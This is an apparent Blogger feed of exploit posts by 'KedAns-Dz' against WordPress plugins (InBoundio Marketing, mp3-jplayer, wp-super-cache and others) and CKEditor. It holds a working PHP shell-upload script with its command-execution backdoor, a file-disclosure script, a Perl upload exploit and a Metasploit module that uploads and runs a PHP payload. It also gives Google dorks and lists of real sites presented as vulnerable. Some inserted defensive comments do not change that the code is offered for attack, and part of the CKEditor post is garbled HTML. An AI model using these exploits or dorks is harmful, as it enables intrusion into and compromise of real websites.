tag:blogger.com,1999:blog-14702990296772696342024-03-13T13:59:16.486-07:00K3dxGHSecurityKernel of the Penetration Testing & IT SecurityAnonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.comBlogger6125tag:blogger.com,1999:blog-1470299029677269634.post-25069522942494897252015-03-23T04:19:00.002-07:002015-03-23T04:19:18.994-07:00WordPress plugin (InBoundio Marketing) Shell Upload Vulnerability<?php<br />
###########################################<br />
# >> D_x . Made In Algeria . x_Z << #<br />
###########################################<br />
#<br />
# [>] Title : WordPress plugin (InBoundio Marketing) Shell Upload Vulnerability<br />
#<br />
# [>] Author : KedAns-Dz<br />
# [+] E-mail : ked-h (@hotmail.com)<br />
# [+] FaCeb0ok : fb.me/K3d.Dz<br />
# [+] TwiTter : @kedans<br />
#<br />
# [#] Platform : PHP / WebApp<br />
# [+] Cat/Tag : File Upload / Code Exec<br />
#<br />
# [<] <3 <3 Greetings t0 Palestine <3 <3<br />
# [!] Vendor : http://www.inboundio.com<br />
#<br />
###########################################<br />
#<br />
# [!] Description :<br />
#<br />
# WordPress plugin InBoundio Marketing v1.0 suffers from a file/shell upload vulnerability:<br />
# a remote attacker can upload a file/shell/backdoor and execute commands.<br />
#<br />
####<br />
# Lines (6... to 20) : csv_uploader.php<br />
####<br />
#<br />
# ExpLO!T :<br />
# -------<br />
<br />
# Review note (defensive reading of the request built below):<br />
# - It is a multipart POST carrying a single form field named 'file', sent directly to<br />
#   admin/partials/csv_uploader.php inside the plugin directory.<br />
# - No cookie, nonce or credential is attached to the request, so the advisory implies the<br />
#   endpoint checks neither authentication nor file type -- the vulnerable code is not shown<br />
#   here; confirm against csv_uploader.php in the plugin source.<br />
# - Mitigation: remove the plugin (or apply a vendor fix if one exists), deny direct web access<br />
#   to the plugin's admin/partials/ scripts, and disable PHP execution in its uploaded_csv/ directory.<br />
# - Detection: look for POSTs to this path in web access logs and for non-CSV files in uploaded_csv/.<br />
$postData = array();<br />
# The legacy '@' prefix marks the value as a local file to attach to the form.<br />
$postData[ 'file' ] = "@k3dz.php"; #Shell_2_Exec ;)<br />
<br />
$dz = curl_init();<br />
# [Target] is a placeholder for the host; the path is the plugin's upload handler.<br />
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");<br />
# Fixed, dated browser User-Agent string -- usable as a weak log indicator for this exact script.<br />
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");<br />
curl_setopt($dz, CURLOPT_POST, 1);<br />
# Passing an array makes cURL encode the body as multipart/form-data.<br />
curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );<br />
# 0 means no overall timeout for the transfer.<br />
curl_setopt($dz, CURLOPT_TIMEOUT, 0);<br />
$buf = curl_exec ($dz);<br />
curl_close($dz);<br />
unset($dz);<br />
echo $buf;<br />
<br />
/*<br />
[!] creat your shell file =><br />
_ k3dz.php :<br />
<br />
<?php system($_GET['dz']); ?><br />
<br />
[>] Post the exploit<br />
[+] Find you'r backdoor : ../inboundio-marketing/admin/partials/uploaded_csv/k3dz.php?dz=[ CMD ]<br />
[+] Or upload what you whant ^_^ ...<br />
<br />
*/<br />
<br />
####<br />
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !><br />
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3<br />
#---------------------------------------------------------------<br />
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,<br />
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,<br />
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &<br />
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &<br />
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &<br />
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &<br />
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;<br />
####<br />
?><br />
<div>
<br /></div>
Anonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.com0tag:blogger.com,1999:blog-1470299029677269634.post-67641329115864272652015-03-23T04:17:00.002-07:002015-03-23T04:17:25.064-07:00WordPress plugin (PageBuilderSandwich v0.7.1) Full Path Disclosure###########################################<br />
# >> D_x . Made In Algeria . x_Z << #<br />
###########################################<br />
#<br />
# [>] Title : WordPress plugin (PageBuilderSandwich v0.7.1) Full Path Disclosure<br />
#<br />
# [>] Author : KedAns-Dz<br />
# [+] E-mail : ked-h (@hotmail.com)<br />
# [+] FaCeb0ok : fb.me/K3d.Dz<br />
# [+] TwiTter : @kedans<br />
#<br />
# [#] Platform : PHP / WebApp<br />
# [+] Cat/Tag : Path Disclosure<br />
#<br />
# [<] <3 <3 Greetings t0 Palestine <3 <3<br />
# [!] Vendor : https://github.com/gambitph/Page-Builder-Sandwich<br />
#<br />
###########################################<br />
#<br />
# [!] Description :<br />
#<br />
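# WordPress plugin page-builder-sandwich v0.7.1 suffers from full path disclosure:<br />
# a remote attacker can disclose the full path of the script on the server.<br />
# (Presumably the files listed below raise a PHP error when requested directly; turning off<br />
# display_errors in production keeps the path out of the response.)<br />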
#<br />
# CWE-200<br />
#<br />
####<br />
#<br />
# http://[Target]/wp-content/plugins/page-builder-sandwich/inc/shortcake/shortcode-ui.php<br />
# http://[Target]/wp-content/plugins/page-builder-sandwich/inc/simple_html_dom.php<br />
# http://[Target]/wp-content/plugins/page-builder-sandwich/lib/shortcode/ *.php<br />
#<br />
####<br />
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !><br />
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3<br />
#---------------------------------------------------------------<br />
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,<br />
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,<br />
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &<br />
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &<br />
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &<br />
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &<br />
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;<br />
####Anonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.com0tag:blogger.com,1999:blog-1470299029677269634.post-37454894326192039922015-03-23T04:13:00.002-07:002015-03-23T04:13:39.624-07:00WordPress plugin (mp3-jplayer v2.3) Local File Disclosure<?php<br />
###########################################<br />
# >> D_x . Made In Algeria . x_Z << #<br />
###########################################<br />
#<br />
# [>] Title : WordPress plugin (mp3-jplayer v2.3) Local File Disclosure<br />
#<br />
# [>] Author : KedAns-Dz<br />
# [+] E-mail : ked-h (@hotmail.com)<br />
# [+] FaCeb0ok : fb.me/K3d.Dz<br />
# [+] TwiTter : @kedans<br />
#<br />
# [#] Platform : PHP / WebApp<br />
# [+] Cat/Tag : File Disclosure<br />
#<br />
# [<] <3 <3 Greetings t0 Palestine <3 <3<br />
# [!] Vendor : http://mp3-jplayer.com<br />
#<br />
###########################################<br />
#<br />
# [!] Description :<br />
#<br />
# WordPress plugin mp3-jplayer v2.3 suffers from local file disclosure:<br />
# a remote attacker can download/disclose files from the root path.<br />
#<br />
# ExpLO!T :<br />
# -------<br />
#<br />
# Review note (defensive reading of the request built below):<br />
# - It is a plain GET to the plugin's download.php; the file to return is named by the<br />
#   'mp3' query parameter ([Target] and [ LFI ] are placeholders left by the author).<br />
# - The advisory claims the parameter is not confined to the media directory; the vulnerable<br />
#   code is not shown here, so confirm against download.php in the plugin source.<br />
# - Mitigation: resolve the requested path server-side and refuse anything outside the allowed<br />
#   media directory; restrict or remove direct access to download.php.<br />
# - Detection: review access logs for requests to download.php (and the downloader.php variant<br />
#   named in the trailing comment) whose 'mp3' value contains path separators or traversal sequences.<br />
$dz = curl_init();<br />
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/mp3-jplayer/download.php?mp3=[ LFI ].mp3"); # or ../remote/downloader.php?mp3=[ LFI ].ogg<br />
curl_setopt($dz, CURLOPT_HTTPGET, 1);<br />
# Fixed, dated browser User-Agent string -- usable as a weak log indicator for this exact script.<br />
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");<br />
# 0 means no overall timeout for the transfer.<br />
curl_setopt($dz, CURLOPT_TIMEOUT, 0);<br />
$buf = curl_exec ($dz);<br />
curl_close($dz);<br />
unset($dz);<br />
echo $buf;<br />
<br />
####<br />
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !><br />
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3<br />
#---------------------------------------------------------------<br />
# Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 ,<br />
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,<br />
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &<br />
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &<br />
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &<br />
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &<br />
# PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ;<br />
####<br />
?>Anonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.com0tag:blogger.com,1999:blog-1470299029677269634.post-3746988401207904392015-03-20T14:13:00.001-07:002015-03-20T14:13:14.137-07:00Wordpress Plugin (wp-super-cache) Absolute Path Traversal~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /> -----------------------------------------<br /> [Copyright (c) 2015 | Dz Offenders Cr3w ]<br /> -----------------------------------------<br /><br />###########################################<br /># >> D_x . Made In Algeria . x_Z << #<br />###########################################<br />#<br /># [>] Title : Wordpress Plugin (wp-super-cache) Absolute Path Traversal<br />#<br /># [>] Author : KedAns-Dz<br /># [+] E-mail : ked-h (@hotmail.com)<br /># [+] FaCeb0ok : fb.me/K3d.Dz<br /># [+] TwiTter : @kedans<br />#<br /># [#] Platform : PHP / WebApp<br /># [+] Cat/Tag : Directury & Path Traversal<br />#<br /># [<] <3 <3 Greetings t0 Palestine <3 <3<br />#<br /># [!] Vendor : wordpress.org<br /># [D] Download : https://wordpress.org/plugins/wp-super-cache/<br /># [V] Version : x.ALL -> latest 1.4.2<br />#<br />#######################################################################<br />#<br /># [!] Description :<br /># -----------------<br /># <br /># - Wordpress Plugin (wp-super-cache) is suffer from Absolute Path Traversal<br /># his allows attackers to traverse the file system to access files or directories <br /># that are outside of the restricted directory. <br />#<br /># [*] CWE-36<br />#<br />#####<br />#<br /># [!] 
Google Dork : <br /># -----------------<br />#<br /># - inurl:/wp-content/plugins/wp-super-cache/<br />#<br />#####<br />#<br /># [>] Demos :<br /># -----------<br />#<br /># http://gossipextra.com/wp-content/cache/supercache/<br /># http://popathon.org/learningtocount/wp-content/cache/supercache/<br /># http://college-deparcieux.fr/radio/wp-content/cache/supercache/<br /># http://nutritionwonderland.com/wp-content/plugins/wp-super-cache/<br /># http://www.houstonkraft.com/wp-content/plugins/wp-super-cache/<br /># Mo in gooGlE *_^ ....<br />#<br />#####<br />#<br /># [F] Bug Fix :<br /># -------------<br />#<br /># - Just put index.html & .htaccess into the Plugin Path :D ;)<br /># very easy : No ThanX by the way ^__^<br />#<br />####<br /># <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !><br /># Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3<br />#---------------------------------------------------------------<br /># Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , <br /># Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,<br /># & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &<br /># & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &<br /># & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &<br /># & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & <br /># =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=<br />####Anonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.com0tag:blogger.com,1999:blog-1470299029677269634.post-42933049871361474872015-03-20T14:10:00.001-07:002015-03-20T14:10:17.383-07:00Wordpress Plugins (error_log) Full Path Disclosure###########################################<br />#-----------------------------------------<br />#[Copyright (c) 2015 | Dz Offenders Cr3w ]<br />
#-----------------------------------------<br />###########################################<br /># >> D_x . Made In Algeria . x_Z << #<br />###########################################<br />#<br /># [>] Title : Wordpress Plugins (error_log) Full Path Disclosure<br />#<br /># [>] Author : KedAns-Dz<br /># [+] E-mail : ked-h (@hotmail.com)<br /># [+] FaCeb0ok : fb.me/K3d.Dz<br /># [+] TwiTter : @kedans<br />#<br /># [#] Platform : PHP / WebApp<br /># [+] Cat/Tag : Full Path Disclosure<br />#<br /># [<] <3 <3 Greetings t0 Palestine <3 <3<br />#<br /># [!] Vendor : wordpress.org<br /># [D] Download : ** Multiple Plugins **<br /># [V] Version : Wordpress x.ALL->latest (with vulnerable plugin installed)<br />#<br />#######################################################################<br />#<br /># [!] Description :<br /># -----------------<br /># <br /># - Wordpress Plugins (Multiple Plugins) is suffer from Full Path Disclosure<br /># allows remote attackers to disclosure the error_log revealing the full path script.<br /># <br /># > Moore Info see :<br /># [*] CWE-200<br />#<br />#####<br />#<br /># [!] 
Google Dork : <br /># -----------------<br />#<br /># - inurl:/wp-content/plugins/(*)/error_log<br />#<br />#####<br />#<br /># [>] Demos :<br /># -----------<br />#<br /># http://www.lifeintheoffice.com/wp-content/plugins/wordspew/error_log<br /># http://unitedfreeworld.com/wp-content/plugins/download-monitor/error_log<br /># http://threads13.com/wp-content/plugins/astickypostorderer/error_log<br /># http://www.ancira.us/jake/wp-content/plugins/astickypostorderer/error_log<br /># http://culturalcenter.gov.ph/wp-content/plugins/icg-ticketing-system/view/yespayments/error_log<br /># http://www.yootheniks.com/wp/wp-content/plugins/zingiri-tickets/extensions/error_log<br /># http://www.londonru.com/realestate/wp-content/plugins/firestorm-real-estate-plugin/error_log<br /># http://www.duomcgaw.com/lemonbarrettsreview/wp-content/plugins/re/error_log<br /># http://wazefte.com/portal/wp-content/plugins/fbc/inc/api/error_log<br /># http://www.vadimkolpakov.com/wp-content/plugins/limit-login-attempts/error_log<br /># http://bendsensigns.com/wp-content/plugins/peters-login-redirect/error_log<br /># http://www.rak-rijeka.org/wp-content/plugins/sidebar-login/error_log<br /># http://www.mercysong.com/wp-content/plugins/limit-login-attempts/error_log<br /># http://thebills.ca/wp-content/plugins/wp-mailinglist/views/email/error_log<br /># http://www.vadimkolpakov.com/wp-content/plugins/limit-login-attempts/error_log<br />#<br /># Mo in gooGlE *_^ ....<br />#<br />#####<br />#<br /># [F] Bug Fix :<br /># -------------<br />#<br /># - protect (error_log) with .htaccess and put it into the Plugin Path :D ;)<br /># very easy : No ThanX by the way ^__^<br />#<br />####<br /># <! THE END ^_* ! 
, Good Luck all <3 | 0-DAY Aint DIE ^_^ !><br /># Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3<br />#---------------------------------------------------------------<br /># Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , <br /># Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,<br /># & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &<br /># & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &<br /># & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &<br /># & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & <br /># =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=<br />####Anonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.com0tag:blogger.com,1999:blog-1470299029677269634.post-87808756592667855212015-03-20T14:06:00.001-07:002015-03-20T14:06:35.636-07:00Ckeditor v4.4.7.xx Multiple Vulnerabilities<intro -="" 03-2015="" 1337day="" 4.4.x="" all="" and="" arbitrary="" arget="" by="" chomp="" ckeditor="" coded="" contact:="" copyright="" cr3w="" dz="" exploit="" file="" greetings:="" homies="" host="" hotmail.com="" intro="" ked-h="" kedans-dz="" my="" offenders="" path:="" print="" tar="<STDIN" upload=""><stdin><ked-h at="" day.com="">#################################</ked-h></stdin></intro><br />
<intro -="" 03-2015="" 1337day="" 4.4.x="" all="" and="" arbitrary="" arget="" by="" chomp="" ckeditor="" coded="" contact:="" copyright="" cr3w="" dz="" exploit="" file="" greetings:="" homies="" host="" hotmail.com="" intro="" ked-h="" kedans-dz="" my="" offenders="" path:="" print="" tar="<STDIN" upload=""><stdin><ked-h at="" day.com="">#-----------------------------------------<br />#[Copyright (c) 2015 | Dz Offenders Cr3w]<br />#-----------------------------------------<br />################################</ked-h></stdin></intro><br />
<intro -="" 03-2015="" 1337day="" 4.4.x="" all="" and="" arbitrary="" arget="" by="" chomp="" ckeditor="" coded="" contact:="" copyright="" cr3w="" dz="" exploit="" file="" greetings:="" homies="" host="" hotmail.com="" intro="" ked-h="" kedans-dz="" my="" offenders="" path:="" print="" tar="<STDIN" upload=""><stdin><ked-h at="" day.com=""># >> D_x . Made In Algeria . x_Z << #<br />################################</ked-h></stdin></intro><br />
<intro -="" 03-2015="" 1337day="" 4.4.x="" all="" and="" arbitrary="" arget="" by="" chomp="" ckeditor="" coded="" contact:="" copyright="" cr3w="" dz="" exploit="" file="" greetings:="" homies="" host="" hotmail.com="" intro="" ked-h="" kedans-dz="" my="" offenders="" path:="" print="" tar="<STDIN" upload=""><stdin><ked-h at="" day.com="">#<br /># [>] Title : Ckeditor v4.4.7.xx Multiple Vulnerabilities<br />#<br /># [>] Author : KedAns-Dz<br /># [+] E-mail : ked-h (@hotmail.com)<br /># [+] FaCeb0ok : fb.me/K3d.Dz<br /># [+] TwiTter : @kedans<br />#<br /># [#] Platform : PHP / WebApp<br /># [+] Cat/Tag : File Upload , XSRF-HTML Injection<br />#<br /># [<] <3 <3 Greetings t0 Palestine <3 <3<br /># [>] ^_^ Greetings to 1337day Users/FAN's <3<br /># [-] F-ck Hacking , LuV Exploiting<br /># [!] Vendor : http://ckeditor.com/<br /># [D] Download : <br /># - http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.4.7/ckeditor_4.4.7_full.zip<br />#<br />#######################################################################<br />#<br /># [!] Description :<br />#<br /># FCKeditor version 4.4.7 is suffer from XSS/HTML Injection and <br /># Other multiple vulnerabilities like File Upload (more ex: see-> <br /># [ http://1337day.com/search?search_request=ckeditor ]<br /># remote attacker can use some CKE files to upload remote file or <br /># Injecting XSS/HTML Codes.<br />#<br />#<br />#####<br />#<br /># [!] 
Google Dorks : <br /># ------------------<br /># 1- allinurl:"/ckeditor/samples/plugins/htmlwriter"<br /># 2- allinurl:"/ckeditor/samples/plugins/htmlwriter/outputhtml.html"<br /># 3- allinurl:"/FCKeditor/_samples/php/sample01.php"<br /># 4- allinurl:"/FCKeditor/editor/filemanager/browser/default/browser.html"<br /># 5- allinurl:"/FCKeditor/editor/filemanager"<br />#<br />#####<br />#<br /># [+] Exploit (1) ' XSS/XSRF/HTML Injection ' :=><br /># -----------------------------------------------<br />#<br /># - the vuln in htmlwriter plugin :<br />#<br /># > http://[target]/[path]/ckeditor/samples/plugins/htmlwriter/outputhtml.html<br />#<br /># > Edit & Submit you'r Code just it !<br />#<br />#####<br />#<br /># [+] Exploit (2) ' File Upload ' :=><br /># -----------------------------------<br /># REF : http://1337day.com/search?search_request=ckeditor<br />#<br /># +> Use this PERL Script :=><br /># ***********<br /># #!/usr/bin/perl<br />#<br /># use strict;<br /># use LWP::UserAgent;<br /># use HTTP::Request::Common;<br /># <br /># print <<INTRO;<br /># - CKEditor 4.4.x Arbitrary File Upload Exploit<br /># - Coded By KedAns-Dz<br /># - Contact: ked-h@hotmail.com<br /># - Greetings: 1337day , Dz Offenders , All my Homies<br /># - Copyright (C) 03-2015 - Dz Offenders Cr3w<br /># INTRO<br /># print "Target host and Path: ";<br /># chomp (my $tar=<STDIN>);<br /># print "Directory / File / Shell: ";<br /># chomp (my $shell=<STDIN>);<br /># <br /># my $a = LWP::UserAgent->new;<br /># my $b = $a->request(POST $tar.'/fckeditor/editor/filemanager/browser/upload/php/upload.php';<br /># Content_Type => 'form-data',<br /># Content => [ NewFile => $shell ] );<br /># <br /># if ($b->is_success) {<br /># if (index($b->content, "Disabled") != -1) { print "The webserver is manipulated with your shellcode.\n"; } <br /># else { print "Exploit failed! 
:(\n";<br /># } else { print "Not connected with Target!\n"; }<br />#<br />##########<br /># *********<br /># Or wit' that MSF Exploit :=><br />#<br />#<br /># require 'msf/core'<br /># <br /># class Metasploit3 < Msf::Exploit::Remote<br /># Rank = ExcellentRanking<br /># <br /># include Msf::Exploit::Remote::HttpClient<br /># <br /># def initialize(info = {})<br /># super(update_info(info,<br /># 'Name' => 'FCKeditor 4.4.x File Upload Code Execution',<br /># 'Description' => %q{<br /># This module exploits a vulnerability in the FCK/CKeditor plugin.<br /># By renaming the uploaded file this vulnerability can be used to upload/execute<br /># code on the affected system.<br /># },<br /># 'Author' => [ 'KedAns-Dz <ked-h[at]1337day.com>' ],<br /># 'License' => MSF_LICENSE,<br /># 'Version' => '1.0',<br /># 'References' =><br /># [<br /># ['URL', 'http://1337day.com/search?search_request=ckeditor'],<br /># ],<br /># 'Privileged' => false,<br /># 'Payload' =><br /># {<br /># 'DisableNops' => true,<br /># 'Compat' =><br /># {<br /># 'ConnectionType' => 'find',<br /># },<br /># 'Space' => 1024,<br /># },<br /># 'Platform' => 'php',<br /># 'Arch' => ARCH_PHP,<br /># 'Targets' => [[ 'Automatic', { }]],<br /># 'DisclosureDate' => '02/05/2011',<br /># 'DefaultTarget' => 0))<br /># <br /># register_options(<br /># [<br /># OptString.new('URI', [true, "CKE Target directory path", "/"]),<br /># ], self.class)<br /># end<br /># <br /># def check<br /># uri = ''<br /># uri << datastore['URI']<br /># uri << '/' if uri[-1,1] != '/'<br /># uri << 'fckeditor/editor/filemanager/connectors/php/upload.php?Type=File'<br /># res = send_request_raw(<br /># {<br /># 'uri' => uri<br /># }, 25)<br /># <br /># if (res and res.body =~ /sample16.swf/)<br /># return Exploit::CheckCode::Vulnerable<br /># end<br /># <br /># return Exploit::CheckCode::Safe<br /># end<br /># <br /># <br /># def retrieve_obfuscation()<br /># <br /># end<br /># <br /># <br /># def exploit<br /># <br /># cmd_php = '<?php 
' + payload.encoded + '?>'<br /># <br /># # Generate some random strings<br /># cmdscript = rand_text_alpha_lower(20)<br /># boundary = rand_text_alphanumeric(6)<br /># <br /># # Static files<br /># directory = '/fckeditor/editor/images'<br /># uri_base = ''<br /># uri_base << datastore['URI']<br /># uri_base << '/' if uri_base[-1,1] != '/'<br /># uri_base << 'fckeditor/editor/filemanager/connectors/php'<br /># <br /># # Get obfuscation code (needed to upload files)<br /># obfuscation_code = nil<br /># <br /># res = send_request_raw({<br /># 'uri' => uri_base + '/upload.php?Type=File'<br /># }, 25)<br /># <br /># if (res)<br /># <br /># if(res.body =~ /"obfus", "((\w)+)"\)/)<br /># obfuscation_code = $1<br /># print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")<br /># else<br /># print_error("Error retrieving obfuscation code!")<br /># return<br /># end<br /># end<br /># <br /># # Upload shellcode (file ending .ph.p)<br /># data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\n"<br /># data << "#{cmdscript}.ph.p\r\n--#{boundary}"<br /># data << "\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"<br /># data << "Content-Type: application/octet-stream\r\n\r\n"<br /># data << cmd_php<br /># data << "\r\n--#{boundary}--"<br /># <br /># res = send_request_raw({<br /># 'uri' => uri_base + "/connector.php?Command=FileUpload&Type=File&CurrentFolder=" + directory + "&obfuscate=#{obfuscation_code}",<br /># 'method' => 'POST',<br /># 'data' => data,<br /># 'headers' =><br /># {<br /># 'Content-Length' => data.length,<br /># 'Content-Type' => 'multipart/form-data; boundary=' + boundary,<br /># }<br /># }, 25)<br /># <br /># if (res and res.body =~ /File Upload Success/)<br /># print_status("Successfully uploaded #{cmdscript}.ph.p")<br /># else<br /># print_error("Error uploading #{cmdscript}.ph.p")<br /># end<br />#<br /># # Complete the upload process (rename file)<br /># 
print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")<br /># res = send_request_raw({<br /># 'uri' => uri_base + '/connector.php?Command=FileUpload&Type=File&CurrentFolder=' + directory + '&filetotal=1'<br /># })<br /># <br /># # Rename the file from .ph.p to .php<br /># res = send_request_cgi(<br /># {<br /># 'method' => 'POST',<br /># 'uri' => uri_base + '/connector.php?Command=Edit&Type=File&CurrentFolder=',<br /># 'vars_post' =><br /># {<br /># 'actionfile[0]' => "#{cmdscript}.ph.p",<br /># 'renameext[0]' => 'p',<br /># 'renamefile[0]' => "#{cmdscript}.ph",<br /># 'sortby' => 'name',<br /># 'sorttype' => 'asc',<br /># 'showpage' => '0',<br /># 'action' => 'rename',<br /># 'commit' => '',<br /># }<br /># }, 10)<br /># <br /># if (res and res.body =~ /successfully renamed./)<br /># print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")<br /># else<br /># print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")<br /># end<br /># <br /># <br /># # Finally call the payload<br /># print_status("Calling payload: #{cmdscript}.php")<br /># uri = ''<br /># uri << datastore['URI']<br /># uri << '/' if uri[-1,1] != '/'<br /># uri << directory + cmdscript + ".php"<br /># res = send_request_raw({<br /># 'uri' => uri<br /># }, 25)<br /># <br /># end<br /># <br /># end<br />#<br />#<br />#<br />###########<br />#<br /># Demo's :=><br /># http://common.beyondindigopets.com/ckeditor/samples/plugins/htmlwriter/outputhtml.html<br /># http://heather.cs.ucdavis.edu/ckeditor/samples/plugins/htmlwriter/outputhtml.html<br /># http://dol-de-bretagne.fr/scripts/FCKeditor/_samples/php/sample01.php<br /># http://tutor.talkbean.com/front/com/FCKeditor/editor/filemanager/browser/default/browser.html<br /># http://www.aseat.fr/fckeditor/editor/filemanager/browser/default/browser.html<br /># Mo in g00glE ;)<br />#######################################################################<br />#<br /># REF :<br /># > 
http://packetstormsecurity.com/files/130807/Ckeditor-4.4.7-Shell-Upload-Cross-Site-Scripting.html<br /># > https://cxsecurity.com/issue/WLB-2015030092<br /># > OSVDB : http://osvdb.org/show/osvdb/119607<br /># <br />####<br /># <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !><br /># Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3<br />#---------------------------------------------------------------<br /># Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , <br /># Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,<br /># & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &<br /># & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &<br /># & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &<br /># & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & <br /># =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=<br />####<br /><!--3--></ked-h></stdin></intro><!--3--><!--3-->Anonymoushttp://www.blogger.com/profile/09011362487543310861noreply@blogger.com0